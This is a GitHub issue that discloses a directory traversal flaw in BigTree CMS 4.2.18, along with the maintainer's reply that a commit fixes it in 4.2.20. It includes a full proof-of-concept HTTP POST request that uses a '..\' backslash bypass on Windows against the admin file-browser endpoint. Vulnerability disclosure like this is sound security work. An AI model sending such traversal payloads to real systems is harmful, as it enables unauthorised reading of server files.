Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Directory Traversal in bigtreecms 4.2.18
FILE: \BigTree-CMS-4.2.18\core\admin\ajax\developer\extensions\file-browser.php at here, just filter .. and /, but we can use \ bypass on windows
POC:
POST /BigTree-CMS-4.2.18/site/index.php/admin/ajax/developer/extensions/file-browser/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost/BigTree-CMS-4.2.18/site/index.php/admin/developer/extensions/build/files/ Content-Length: 88 Cookie: bigtree_admin[email]=admin%40admin.com; bigtree_admin[login]=%5B%22session-5933aabe111140.52177449%22%2C%22chain-5932b00a19ac87.74446726%22%5D; PHPSESSID=e5l89mgpbpdp4gumsc0qshlve4; hide_bigtree_bar= Connection: keep-alive base_directory=&directory=..\..\..\..\..\&cloud_disabled=true&file=&location=&container=
Trick: use ..\ bypass on windows
email : xfkxfk@secbook.net
The text was updated successfully, but these errors were encountered:
Should fix any path manipulation issues in Windows environments.
2c10b6a
#302 #289
Thanks, this should be fixed in the 4.2.20 release.
Sorry, something went wrong.
@timbuckingham was this issue ever adressed? and if so can you point me to the place where it was fixed? thanks !
There's a referenced commit above where it was resolved: 2c10b6a
No branches or pull requests
Directory Traversal in bigtreecms 4.2.18
FILE:
\BigTree-CMS-4.2.18\core\admin\ajax\developer\extensions\file-browser.php
at here, just filter .. and /, but we can use \ bypass on windows
POC:
Trick:
use ..\ bypass on windows
email : xfkxfk@secbook.net
The text was updated successfully, but these errors were encountered: